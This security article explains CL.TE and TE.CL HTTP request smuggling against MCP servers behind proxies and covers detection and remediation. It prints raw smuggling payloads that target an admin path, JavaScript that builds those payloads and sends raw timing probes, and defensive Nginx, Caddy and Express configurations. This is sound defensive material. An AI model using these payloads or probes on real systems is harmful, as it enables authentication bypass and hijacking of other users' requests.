MCP server HTTP request smuggling security — CL.TE and TE.CL desync on MCP HTTP endpoints
HTTP request smuggling exploits disagreements between a front-end proxy and a back-end server about where one HTTP request ends and the next begins. On MCP servers deployed behind Nginx, Caddy, or AWS ALB, a single malformed request can prepend attacker-controlled content to a subsequent victim's request, which can bypass authentication, poison shared caches, or hijack another user's tool invocation. The attack is hard to spot in application logs, because the back-end records the smuggled request as if it were ordinary traffic.
How HTTP/1.1 body framing creates the desync opportunity
HTTP/1.1 offers two ways to specify a request body's length: the Content-Length header (an exact byte count) and the Transfer-Encoding: chunked header (variable-length chunks with a terminating zero-length chunk). RFC 7230 (since superseded by RFC 9112) says that if both headers are present in a request, Transfer-Encoding overrides Content-Length, and that such a request ought to be handled as an error because it may be a smuggling attempt.
The problem is that not every component in a proxy chain implements this rule consistently. Some front-end proxies prioritize Content-Length; some back-end servers prioritize Transfer-Encoding; some strip one header before forwarding. When the front-end and back-end disagree about how long a request body is, the back-end interprets leftover bytes from the first request as the beginning of the next request — hence "smuggling."
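The precedence rule can be sketched as a small helper. This is a minimal illustration, assuming headers arrive as a plain object with lower-cased names (the shape Node.js uses for req.headers); resolveFraming is a hypothetical name, not part of any library.

```javascript
// Hypothetical helper: decide how a request body is framed, following the
// RFC 7230 rule that Transfer-Encoding overrides Content-Length.
// Assumes `headers` is a plain object with lower-cased header names.
function resolveFraming(headers) {
  const te = headers['transfer-encoding'];
  const cl = headers['content-length'];
  // Both headers present is the precondition for a CL/TE disagreement.
  const ambiguous = te !== undefined && cl !== undefined;

  if (te !== undefined) {
    const codings = te.split(',').map((c) => c.trim().toLowerCase());
    const lastIsChunked = codings[codings.length - 1] === 'chunked';
    // A request whose final coding is not chunked has no reliable length.
    return { mode: lastIsChunked ? 'chunked' : 'invalid', ambiguous };
  }
  if (cl !== undefined) return { mode: 'content-length', ambiguous };
  return { mode: 'none', ambiguous };
}

console.log(resolveFraming({ 'content-length': '20', 'transfer-encoding': 'chunked' }));
// → { mode: 'chunked', ambiguous: true }
```

A desync becomes possible when one hop applies this rule and the next hop does not; a strict component would reject the request whenever ambiguous is true instead of picking a winner.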
CL.TE desync — front-end uses Content-Length, back-end uses Transfer-Encoding
In CL.TE smuggling, the front-end proxy reads the Content-Length and forwards exactly that many bytes as the first request. The back-end reads the Transfer-Encoding: chunked body, consuming the chunk data and stopping at the zero terminator. Any bytes after the zero terminator are buffered as the start of the next request.
An attacker sends a request like:
POST /mcp/tools HTTP/1.1
Host: api.example.com
Content-Length: 48
Transfer-Encoding: chunked

f
{"tool":"list"}
0

GET /admin HTTP/1.1
X-
The front-end trusts Content-Length, reads all 48 body bytes (the chunk, the zero terminator, and the smuggled fragment), and forwards them as one request. The back-end trusts Transfer-Encoding: it consumes the 15-byte chunk ({"tool":"list"}, chunk size f in hex), stops at the zero terminator, and leaves GET /admin HTTP/1.1\r\nX- buffered as the start of the next request on that connection. When the next legitimate user's request arrives on the same back-end connection, it is appended to the fragment: the victim's request line is absorbed into the dangling X- header, and the back-end processes GET /admin with the victim's remaining headers, including any cookies or Authorization header.
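The disagreement can be reproduced offline by framing the same bytes both ways. The sketch below is a simplified model, not a real proxy or server: it assumes an ASCII-only body, computes the chunk size and Content-Length rather than hard-coding them, and uses hypothetical helper names (buildClTePayload, frameByContentLength, frameByChunked).

```javascript
// Simplified model of a CL.TE split. Assumes an ASCII-only body, so string
// offsets and byte offsets are the same.
const CRLF = '\r\n';

// Build the body: one chunk, the zero terminator, then the smuggled fragment.
function buildClTePayload(chunkData, smuggled) {
  const body =
    Buffer.byteLength(chunkData).toString(16) + CRLF + chunkData + CRLF +
    '0' + CRLF + CRLF +
    smuggled;
  return { body, contentLength: Buffer.byteLength(body) };
}

// Front-end view: exactly Content-Length bytes belong to this request.
function frameByContentLength(body, contentLength) {
  const buf = Buffer.from(body);
  return {
    consumed: buf.subarray(0, contentLength).toString(),
    leftover: buf.subarray(contentLength).toString(),
  };
}

// Back-end view: read chunks until the zero-length chunk, then stop.
function frameByChunked(body) {
  let pos = 0;
  for (;;) {
    const lineEnd = body.indexOf(CRLF, pos);
    const size = lineEnd === -1 ? NaN : parseInt(body.slice(pos, lineEnd), 16);
    if (Number.isNaN(size)) throw new Error('malformed chunked body');
    pos = lineEnd + CRLF.length;
    if (size === 0) {
      pos += CRLF.length; // blank line that ends the chunked body
      break;
    }
    pos += size + CRLF.length; // chunk data plus its trailing CRLF
  }
  return { consumed: body.slice(0, pos), leftover: body.slice(pos) };
}

const { body, contentLength } = buildClTePayload(
  '{"tool":"list"}',
  'GET /admin HTTP/1.1\r\nX-'
);
console.log(JSON.stringify(frameByContentLength(body, contentLength).leftover));
// → ""
console.log(JSON.stringify(frameByChunked(body).leftover));
// → "GET /admin HTTP/1.1\r\nX-"
```

The front-end view leaves nothing behind, while the back-end view leaves the smuggled fragment waiting on the connection.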
TE.CL desync — front-end uses Transfer-Encoding, back-end uses Content-Length
In TE.CL smuggling, the front-end frames the request by its chunked body and forwards all of it. The back-end then frames the same bytes by Content-Length, either because the front-end stripped Transfer-Encoding without correcting Content-Length or because the back-end does not honor the header. If the declared Content-Length is smaller than the actual forwarded body, the back-end buffers the excess as the next request.
The classic TE.CL payload declares a short Content-Length that covers only the first chunk-size line and carries the smuggled request as the chunk data. The front-end sees one complete chunked body; the back-end stops after the chunk-size line and parses the chunk data as a new request on the same connection, ahead of whichever user's request arrives next.
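A TE.CL body can be modeled the same way. In this sketch (ASCII-only input assumed; buildTeClPayload and backEndLeftover are hypothetical names) the smuggled request travels as chunk data and Content-Length covers only the chunk-size line, so a back-end that frames by Content-Length is left holding the smuggled request.

```javascript
// Simplified TE.CL model. Assumes ASCII-only input.
const CRLF = '\r\n';

// The smuggled request is the chunk data; Content-Length counts only the
// chunk-size line that precedes it.
function buildTeClPayload(smuggled) {
  const sizeLine = Buffer.byteLength(smuggled).toString(16) + CRLF;
  const body = sizeLine + smuggled + CRLF + '0' + CRLF + CRLF;
  return { body, contentLength: Buffer.byteLength(sizeLine) };
}

// Back-end view: Content-Length bytes are the body, everything after them
// is parsed as the start of the next request.
function backEndLeftover(body, contentLength) {
  return Buffer.from(body).subarray(contentLength).toString();
}

const smuggled = 'GET /admin HTTP/1.1\r\nHost: api.example.com\r\n\r\n';
const { body, contentLength } = buildTeClPayload(smuggled);
console.log(backEndLeftover(body, contentLength).startsWith('GET /admin HTTP/1.1'));
// → true
```

Real payloads usually give the smuggled request its own Content-Length so that it absorbs the trailing zero chunk; that detail is left out here to keep the framing logic visible.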
Why MCP server deployments are specifically at risk
Several MCP deployment patterns amplify this vulnerability class:
- Long-lived HTTP/1.1 connections: MCP SSE (Server-Sent Events) transports use persistent HTTP/1.1 connections. Persistent connections are required for request smuggling — short-lived connections close after each request, preventing the buffered fragment from being appended to a different user's traffic.
- Multi-tenant proxy setups: MCP servers hosted behind a shared reverse proxy (Nginx fronting multiple tenant back-ends) share the proxy's connection pool. A smuggled request targeting the proxy's back-end connection can affect any tenant whose traffic shares the same keep-alive connection.
- Authentication at the proxy layer: Many MCP deployments perform authentication in the front-end proxy (via Nginx auth_request or an API gateway) and forward requests to an unauthenticated internal back-end. Request smuggling that bypasses the proxy delivers requests to the unauthenticated back-end directly.
- Mixed HTTP/1.1 and HTTP/2 proxy chains: HTTP/2 uses binary framing and does not have the CL/TE ambiguity. But if a front-end terminates HTTP/2 from clients and re-encodes as HTTP/1.1 to the back-end (the common Nginx/Caddy configuration), the H2-to-H1 translation reintroduces the desync opportunity for any client that can influence request headers.
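For the mixed HTTP/2 and HTTP/1.1 case, one possible safeguard is to validate HTTP/2 header fields before they are rewritten as HTTP/1.1. The sketch below is an assumption about how such a check could look, not a description of what Nginx or Caddy do internally; isSafeToDowngrade is a hypothetical name, and the forbidden list follows the HTTP/2 rule that connection-specific fields must not appear in a request.

```javascript
// Hypothetical pre-downgrade check for an HTTP/2 request's header fields.
// HTTP/2 forbids connection-specific fields, and CR, LF, or NUL inside a name
// or value could become a header or request boundary once the request is
// serialized as HTTP/1.1.
const FORBIDDEN_IN_H2 = new Set([
  'connection',
  'keep-alive',
  'proxy-connection',
  'transfer-encoding',
  'upgrade',
]);

function isSafeToDowngrade(h2Headers) {
  for (const [name, value] of Object.entries(h2Headers)) {
    if (FORBIDDEN_IN_H2.has(name.toLowerCase())) return false;
    if (/[\r\n\0]/.test(name) || /[\r\n\0]/.test(String(value))) return false;
  }
  return true;
}

console.log(isSafeToDowngrade({ ':method': 'POST', ':path': '/mcp/tools', 'content-length': '15' }));
// → true
console.log(isSafeToDowngrade({ ':method': 'POST', 'transfer-encoding': 'chunked' }));
// → false
```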
Detection: confirming a TE.CL desync on an MCP endpoint
The standard timing probe for TE.CL sends a chunked body that terminates immediately, followed by one extra byte, under a Content-Length that counts that extra byte. A vulnerable back-end will hold the connection open waiting for the remaining declared bytes, causing a measurable delay compared to a clean endpoint:
POST /mcp/invoke HTTP/1.1
Host: target.example.com
Content-Type: application/json
Content-Length: 6
Transfer-Encoding: chunked

0

X
A front-end that honors Transfer-Encoding forwards the five bytes up to the zero terminator (0\r\n\r\n) and holds back the X. A back-end that honors Content-Length: 6 then waits for the sixth byte, so a response delay of around 10 seconds (versus an instant response on a clean endpoint) indicates TE handling at the front-end and CL handling at the back-end: a TE.CL desync. Rule out CL.TE before sending this probe, because on a CL.TE chain the front-end forwards the X and it stays on the back-end connection, where it corrupts the next user's request.
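The timing probe above can be sent from a short script using Node's built-in net module. This is a rough sketch under stated assumptions: a plain-TCP (non-TLS) endpoint that you are authorized to test, hypothetical helper names (buildProbe, measureDelay), and a default timeout that simply mirrors the 10-second figure above.

```javascript
const net = require('node:net');

// Build the raw probe: both framing headers, with the body "0\r\n\r\nX".
function buildProbe(host, path) {
  const body = '0\r\n\r\nX';
  return [
    `POST ${path} HTTP/1.1`,
    `Host: ${host}`,
    'Content-Type: application/json',
    `Content-Length: ${Buffer.byteLength(body)}`,
    'Transfer-Encoding: chunked',
    '', // blank line between headers and body
    body,
  ].join('\r\n');
}

// Send raw bytes and resolve with the time until the first response byte or
// until the server closes, with timedOut: true if nothing came back in time.
function measureDelay(host, port, rawRequest, timeoutMs = 10000) {
  return new Promise((resolve, reject) => {
    const started = Date.now();
    const socket = net.connect({ host, port }, () => socket.write(rawRequest));
    const finish = (timedOut) => {
      socket.destroy();
      resolve({ elapsedMs: Date.now() - started, timedOut });
    };
    socket.setTimeout(timeoutMs, () => finish(true));
    socket.once('data', () => finish(false));
    socket.once('end', () => finish(false));
    socket.once('error', reject);
  });
}
```

In an async context this could be called as await measureDelay('target.example.com', 80, buildProbe('target.example.com', '/mcp/invoke')). Comparing the result against a baseline request with consistent framing matters more than any single absolute number, since network latency varies.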
Remediation: three layers of defense
1. Reject ambiguous requests at the front-end proxy
Nginx and Caddy can be configured to reject requests that contain both Content-Length and Transfer-Encoding headers — the necessary condition for classic desync. In Nginx:
# nginx.conf: reject requests with both CL and TE headers
# (the map block belongs in the http context)
map $http_transfer_encoding $reject_smuggle {
    default 0;
    "~."    1;  # any Transfer-Encoding present
}

server {
    # Start empty so the check below never reads an unset variable
    set $cl_present "";

    # When Transfer-Encoding is present, capture Content-Length for the check
    if ($reject_smuggle = 1) {
        set $cl_present $http_content_length;
    }

    location /mcp/ {
        # Both framing headers present: refuse the request
        if ($cl_present != "") {
            return 400 "Ambiguous framing headers rejected";
        }
        proxy_pass http://mcp_backend;
        proxy_http_version 1.1;  # keep-alive to back-end
    }
}
2. Enforce HTTP/2 end-to-end where possible
HTTP/2 uses binary framing with explicit stream boundaries and does not support Transfer-Encoding: chunked. If both the client-to-proxy and proxy-to-backend legs use HTTP/2, the CL/TE desync attack surface disappears. In Caddy:
# Caddyfile: H2C (HTTP/2 cleartext) to the back-end
reverse_proxy /mcp/* localhost:3000 {
    transport http {
        versions h2c  # force HTTP/2 cleartext to back-end
    }
}
Node.js MCP servers can enable H2C with http2.createServer(). The HTTP/2 framing layer makes request boundary ambiguity structurally impossible.
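A minimal h2c server along those lines might look like the sketch below. The factory name createH2cServer, the /mcp/ path prefix, and the JSON reply are placeholders chosen for illustration; a real MCP server would route streams to its own handlers.

```javascript
const http2 = require('node:http2');

// Hypothetical factory: an HTTP/2 cleartext (h2c) server with one handler.
function createH2cServer() {
  // http2.createServer() takes no TLS material, so the server speaks h2c.
  const server = http2.createServer();
  server.on('stream', (stream, headers) => {
    const path = headers[':path'] || '';
    const status = path.startsWith('/mcp/') ? 200 : 404;
    stream.respond({ ':status': status, 'content-type': 'application/json' });
    stream.end(JSON.stringify({ ok: status === 200 }));
  });
  return server;
}

// Usage: createH2cServer().listen(3000);
```

Port 3000 matches the localhost:3000 upstream in the Caddyfile above. Because the server only accepts HTTP/2 frames, there is no Content-Length versus Transfer-Encoding decision left for it to make on this hop.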
3. Reject ambiguous framing in the application layer
For MCP servers that cannot change proxy configuration, reject requests at the application layer if both framing headers are present:
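// Express MCP server: reject ambiguous framing
const express = require('express');
const app = express();

app.use((req, res, next) => {
  const hasTE = req.headers['transfer-encoding'] !== undefined;
  const hasCL = req.headers['content-length'] !== undefined;
  if (hasTE && hasCL) {
    // Close the connection so leftover bytes are never parsed as a new request
    res.set('Connection', 'close');
    return res.status(400).json({
      error: 'Ambiguous request framing: both Content-Length and Transfer-Encoding present'
    });
  }
  next();
});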
This does not prevent the smuggled prefix from reaching other back-ends sharing the same proxy connection pool, but it prevents the MCP server itself from acting on a smuggled request.
SkillAudit checks for request smuggling risk factors
SkillAudit's HTTP endpoint analysis checks for deployment patterns that create request smuggling risk: HTTP/1.1 keep-alive to a back-end behind a documented front-end proxy, absence of ambiguous-header rejection middleware, and SSE transports that hold long-lived connections. An A-grade MCP server either enforces HTTP/2 end-to-end, runs a single-hop deployment with no proxy chain, or includes explicit ambiguous-header rejection at both proxy and application layers. See the MCP server security checklist for the full deployment posture gate.